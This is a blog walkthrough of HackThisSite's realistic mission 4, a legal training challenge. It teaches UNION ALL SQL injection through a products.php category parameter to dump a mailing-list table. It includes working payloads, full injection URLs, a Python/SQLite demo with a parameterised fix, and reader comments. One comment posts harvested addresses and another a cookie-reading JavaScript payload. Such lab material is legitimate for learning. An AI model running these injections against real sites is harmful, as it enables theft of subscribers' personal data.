HTS Realistic 4: UNION ALL the Products
Fischer’s Animal Products: A company slaughtering animals and turning their skin into overpriced products sold to rich bastards! Help animal rights activists increase political awareness by hacking their mailing list.
So I finally got around to writing a walkthrough/guide for Hack This Site realistic mission 4. Your objective is to get the email addresses of the subscribers to the newsletter of Fischer’s Animal Products.
From: SaveTheWhales
Message: Hello, I was referred to you by a friend who says you know how to hack into computers and web sites - well I was wondering if you could help me out here. There’s this local store who is killing hundreds of animals a day exclusively for the purpose of selling jackets and purses etc out of their skin! I have been to their website and they have an email list for their customers. I was wondering if you could somehow hack in and send me every email address on that list? I want to send them a message letting them know of the murder they are wearing. Just reply to this message with a list of the email addresses. Please? Their website is at http://www.hackthissite.org/missions/realistic/4/. Thanks so much!!
Start by investigating every part of Fischer’s site. There are essentially two parts that might be vulnerable. The most visible one is the email form: a clearly visible input field where you add your email address and are given an “Email added successfully” message. As in the other missions involving SQL injection, the first step is to try to break out of the string. Try registering an email address containing quotes, both single and double.
Error inserting into table “email”! Email not valid! Please contact an administrator of Fischer’s.
Unsuccessful: the form rejects the input. However, the verbose error leaks an important piece of information: the table name is “email”. Error messages that name tables are exactly the kind of detail a production site should never show to users.
Now for the other part of the website: the product lists. There are two, “fur coats” and “alligator accessories” (what either has to do with whales is beyond me). If you have been as observant as you should be, you will have noticed that both are served by the same file, products.php, with the category ID passed as a URL argument.
What do we want to accomplish? If we only wanted other rows from the same table, we could alter the WHERE part of the SELECT statement by changing the category argument to something like “1 OR category = 2” (which indeed gives you both categories of products on one page, and suggests that the number is dropped into the query unquoted, so no apostrophe is needed to break out). However, we want rows from a different table, the “email” table. This is where the MySQL UNION operator comes in handy. With UNION we can merge the results of two SELECT statements into one result set. For example:
SELECT * FROM table1 UNION ALL SELECT * FROM table2;
The result is every row from table1 followed by every row from table2. This only works if both SELECT statements return the same number of columns (MySQL also tries to reconcile the column types); otherwise MySQL refuses the query with “The used SELECT statements have a different number of columns”. UNION ALL is used instead of plain UNION because UNION implicitly removes duplicate rows, which costs a sort and can reorder or drop rows; UNION ALL simply appends the second result set to the first, which is what we want when extracting data. Let’s assume that the initial query looks something like this:
SELECT * FROM products WHERE category = 1;
We also want the rows from the email table. Therefore, we try the following as the category value: 1 UNION ALL SELECT * FROM email, which makes the final query:
SELECT * FROM products WHERE category = 1 UNION ALL SELECT * FROM email;
Which is exactly what we want. However, this returns nothing of value. Remember the condition from when we UNIONed table1 and table2: both SELECTs must return the same number of columns. A table that only holds newsletter subscribers is likely narrower than a product catalogue, so a fair guess is that “email” has fewer columns than “products” (if the guess were wrong, we would instead name a subset of the email columns rather than padding). Therefore, we pad the email SELECT with extra columns:
SELECT * FROM products WHERE category = 1 UNION ALL SELECT *, NULL FROM email;
NULL is the safest padding value: it is accepted in a column of any type, so it cannot cause a type mismatch, and it renders as nothing. One NULL does not work either, so keep adding NULLs until the page renders rows. It finally works at three NULLs, i.e. four columns in total:
SELECT * FROM products WHERE category = 1 UNION ALL SELECT *, NULL, NULL, NULL FROM email;
Below the category 1 products you now see ten broken images. View the page source and you will find that the src attributes of those images are email addresses: the first column of “products” is the image path, and our single email column landed there. Moving the email column into the second position puts the addresses where the product text is rendered, a far more legible format. (On a real MySQL server an unqualified * mixed with other select items can be a parse error; write email.* instead. The mission accepts the bare * shown below.)
SELECT * FROM products WHERE category = 1 UNION ALL SELECT NULL, *, NULL, NULL FROM email;
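To show how the column-count probing and the column rearrangement described above behave on a real database engine, here is an added example that is not part of the original walkthrough or of HackThisSite. It models a products.php-style page that concatenates the category parameter into its query, but runs on SQLite (standard-library sqlite3) instead of MySQL so it works offline. The table layouts, product rows and addresses are constructed for the example, and the single-column layout of “email” is an assumption, since the mission only reveals the table’s name. It also shows the parameterised fix that the walkthrough itself does not cover.

```python
"""
Added example (not from the original walkthrough): a miniature of a
products.php-style page that builds its SQL by string concatenation,
backed by SQLite instead of MySQL so it runs offline. Table layouts,
sample rows and addresses are constructed for this example.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed schema: products has four columns, email has one (assumed)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE products (image TEXT, name TEXT, price INTEGER, category INTEGER);
        INSERT INTO products VALUES
            ('img/coat1.jpg', 'Mink coat', 900, 1),
            ('img/coat2.jpg', 'Fox coat', 700, 1),
            ('img/shoes.jpg', 'Alligator shoes', 140, 2);
        CREATE TABLE email (email TEXT);
        INSERT INTO email VALUES
            ('alice@example.com'), ('bob@example.org'), ('carol@example.net');
        """
    )
    return conn


def products_vulnerable(conn: sqlite3.Connection, category: str) -> list:
    """The assumed flaw: the ?category= value is pasted straight into the query."""
    sql = "SELECT * FROM products WHERE category = " + category
    return conn.execute(sql).fetchall()


def render(rows: list) -> list:
    """Mimic the listing page: column 1 becomes an <img src>, column 2 the text."""
    return [f'<img src="{r[0]}"> {r[1]} ${r[2]}' for r in rows]


def probe_column_count(conn: sqlite3.Connection, max_cols: int = 8):
    """Grow a list of NULLs until UNION ALL stops complaining about column counts."""
    for n in range(1, max_cols + 1):
        nulls = ", ".join(["NULL"] * n)
        try:
            products_vulnerable(conn, f"1 UNION ALL SELECT {nulls}")
            return n
        except sqlite3.OperationalError:
            # SQLite: "SELECTs to the left and right of UNION ALL do not have
            # the same number of result columns". MySQL reports the same
            # condition as "The used SELECT statements have a different
            # number of columns".
            continue
    return None


def dump_emails(conn: sqlite3.Connection, column_count: int, target_col: int) -> list:
    """Pad email's single column with NULLs and slide it into position target_col.

    email.* is used rather than a bare * because MySQL rejects an unqualified *
    mixed with other select items; SQLite accepts either form.
    """
    pad = ["NULL"] * (column_count - 1)
    select_list = ", ".join(pad[:target_col] + ["email.*"] + pad[target_col:])
    rows = products_vulnerable(conn, f"1 UNION ALL SELECT {select_list} FROM email")
    # Genuine product rows have data in every column; the UNIONed rows are
    # NULL everywhere except the column we aimed the address at.
    return [
        r[target_col]
        for r in rows
        if all(v is None for i, v in enumerate(r) if i != target_col)
    ]


def products_safe(conn: sqlite3.Connection, category: str) -> list:
    """The fix: validate the type, then bind the value instead of concatenating."""
    cat = int(category)  # raises ValueError for anything that is not a whole number
    return conn.execute("SELECT * FROM products WHERE category = ?", (cat,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    n = probe_column_count(db)
    print("products has", n, "columns")
    # Address in column 1 -> it ends up as a broken image src, as on the mission page.
    payload = "1 UNION ALL SELECT email.*, NULL, NULL, NULL FROM email"
    for line in render(products_vulnerable(db, payload)):
        print(line)
    # Address in column 2 -> rendered as product text.
    print(dump_emails(db, n, 1))
```

The probe loop is the walkthrough’s “keep adding NULLs” done mechanically; the rendered lines show why the first payload produced broken images and the rearranged one produced readable text. `products_safe` rejects the payload outright because `int()` refuses it, and even a string that passed validation would be bound as a value rather than spliced into SQL.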
Just copy the list and email it to SaveTheWhales!

Just for clarification for someone who wants to try this out: you just copy the query (after the category = 1) into the URL. It should look like:
http://www.hackthissite.org/missions/realistic/4/products.php?category=1 UNION ALL SELECT NULL, *, NULL, NULL FROM email;
Comment by Sameer Sontakey — July 18, 2007 @ 9:21 pm
Thanks, Sameer. Perhaps I was a bit unclear.
Comment by Tim — July 18, 2007 @ 10:51 pm
Dude, I got the list of emails; where do I give ’em to the guy????
Comment by Zephyr_Samhain — July 25, 2007 @ 10:31 am
Zephyr Samhain: Good job. PM them to the HackThisSite user “SaveTheWhales”.
Comment by Tim — July 25, 2007 @ 1:25 pm
OK, I’ll try it. Thanks for all the info, Tim; this site is really more of a help than a cheat sheet. I try to only read a few lines to start me off, then I do the rest myself. It’s also very helpful if I get stuck.
Comment by Zephyr_Samhain — July 26, 2007 @ 9:53 am
Hello man… you’re like my idol… you have helped me a lot before as well… but I have unfortunately not understood this level at all….
1) Where should we put what?
2) Should we put only ‘ or …’ (etc.) or the whole injection, which will include FROM, WHERE (etc.)?
3) Where should we enter the SQL commands… in the email list?
Comment by Rishi — July 27, 2007 @ 7:32 pm
Zephyr_Samhain: Nice. Good luck.
Rishi:
1) Put the stuff in the code boxes (after “SELECT * FROM products WHERE category = “, since that part is already included internally in the PHP script) instead of the number in “products.php?category=1″.
2) Do not include “SELECT * FROM products WHERE category = “, i.e. you should only inject “1 UNION ALL SELECT NULL, *, NULL, NULL FROM email;”. The reason is that the other stuff is already hard-coded into the PHP script.
3) No; the email list is invulnerable to SQL injections. Instead, put it in the URL of the product page, after “products.php?category=”.
Comment by Tim — July 27, 2007 @ 11:28 pm
For some dumb reason the SQL injection would not work. I understand MOST of it and how it works. Every time I write the SQL injection in the email field, I get the same message:
——————————————————————–
Error inserting into table “email”! Email not valid! Please contact an administrator of Fischer’s.
——————————————————————–
Are you supposed to change email; to: email@email.com
SELECT * FROM products WHERE category = 1 UNION ALL SELECT NULL, *, NULL, NULL FROM email;
I know, with 1 year’s worth of programming, that some of the variables are not right.
But my question is: why do I get that same old message after an injection?
Reply:::
Comment by Mt1Яund — August 24, 2007 @ 10:45 pm
http://www.hackthissite.org/missions/realistic/4/products.php?category=11UNION%20ALL%20SELECT%20NULL,%20*,%20NULL,%20NULL%20FROM%20email;
that is better
Comment by friedchicken — August 28, 2007 @ 2:54 pm
I’ve got the list of emails, but how exactly do I complete the mission and get the ‘gratz’ message?
There is no email to send the list to?…
Comment by mumin — September 16, 2007 @ 2:33 pm
Mumin: Message it through the HTS messaging system.
Comment by Tim — September 16, 2007 @ 7:03 pm
Good website!!
Thanks
Comment by secureforever — October 1, 2007 @ 4:09 pm
How the fuck do you PM the guy? I can’t find it anywhere lol
Comment by anonomous — October 6, 2007 @ 2:08 pm
Er, I don’t know. I tried to PM SaveTheWhales and it says “Error Sending Message: User may not exist. You may have tried to send an invalid message type.”
Comment by SN — October 13, 2007 @ 12:39 am
Fashion and Clothing Tips…
I couldn’t understand some parts of this article, but it sounds interesting…
Trackback by Fashion and Clothing Tips — October 17, 2007 @ 4:30 am
Products
Yes, these are authentic alligator shoes, made from real alligators!$140
Alligator purses! We tear the skin off alligators and put it in purse form so you can put your money and makeup in!$70
Belts made of alligators! Different colors available, contact us for more information!$30
alph-alpha-brown@hotmail.com
sam.goodwin@yahoo.com
UltraDeathLaser@aol.com
SwingLow@hotmail.com
TeaBody@aol.com
jsmith@uic.edu
3ambeer@graffiti.net
shootfirst@yahoo.com
Bobby@friends.com
Comment by Anonymous — October 18, 2007 @ 4:49 am
Ok - If you copy and paste this into the browser:
http://www.hackthissite.org/missions/realistic/4/products.php?category=1 UNION ALL SELECT NULL,*,NULL,NULL FROM email;
for me it does not work.
However, if you copy and paste THIS into the browser,
http://www.hackthissite.org/missions/realistic/4/products.php?category=11UNION%20ALL%20SELECT%20NULL,%20*,%20NULL,%20NULL%20FROM%20email;
it does work, even though it is the EXACT same thing. Can anyone explain it to me? I would have had this working 10 hours ago if it weren’t for this…please help thanks.
Comment by Nemadrias — October 23, 2007 @ 6:49 pm
Clicking the links directly is disastrous, I tell you….. after clicking it, try this: javascript:alert(document.cookie)
Comment by bh## — November 23, 2007 @ 11:11 am
http://www.hackthissite.org/missions/realistic/4/products.php?category=11UNION%20ALL%20SELECT%20NULL,%20*,%20NULL,%20NULL%20FROM%20email;
does not work for me; it only comes up with half the email addresses. Can anyone explain why this is happening?
Comment by Anonymous — November 28, 2007 @ 4:49 pm
Late…but look at it carefully. You didn’t put spaces after the commas. And people…don’t post the answer. Nobody learns that way.
Comment by hx0r — January 2, 2008 @ 4:04 pm
Dude, the first one is =1 UNION
the second is =11UNION
Comment by xant — February 21, 2008 @ 4:11 pm
How do you pm the guy to complete the mission?
Comment by Geigs — March 16, 2008 @ 6:43 pm
Oh, dare to tell. Can’t send the message to >SaveTheWales
Comment by gutag — March 28, 2008 @ 9:56 pm
I keep getting the “Error Sending Message: User may not exist. You may have tried to send an invalid message type.” when I try to PM it to SaveTheWales. What am I doing wrong?
Comment by Liam — March 31, 2008 @ 2:19 am
How to send the email?
Comment by Anonymous — April 3, 2008 @ 4:49 am
What should I do? It says “The requested users to be added do not exist!!!!”
Comment by Anonymous — April 22, 2008 @ 10:09 pm
After you get the e-mails just go back to HtS page and at your left click on “HTS Messages Center”. Then, on Compose. Put SaveTheWhales as receiver and just paste the e-mails on the message box. Gratz, you completed it.
PS: Thanks for these awesome guides, Tim
Comment by RaGe — May 1, 2008 @ 1:04 pm
If you still haven’t grasped the e-mail concept, go to
http://www.hackthissite.org/pages/messages/msys/send.php
Great guide Tim, fast, simple, and informative.
Comment by Lambda — May 12, 2008 @ 10:23 pm
As a note to anyone having trouble sending the message and completing the mission, you CANNOT send the message after clicking on the “Private Messages” link. You need to go to the HTS message center and send the message from there.
Alternatively, use the link that Lambda provided above. It should work.
Comment by Fakr — July 10, 2008 @ 4:59 am
Thanks for making that clear, Fakr.
Comment by Tim — July 11, 2008 @ 9:45 am
OK, 3 things…
1. Can people stop posting the answer? (I need to learn, not read a walkthrough =]
2. Can anyone explain why & how you get to thinking of more NULLs?
3. Great site.. Cheers!
Comment by riQeh — August 7, 2008 @ 11:00 pm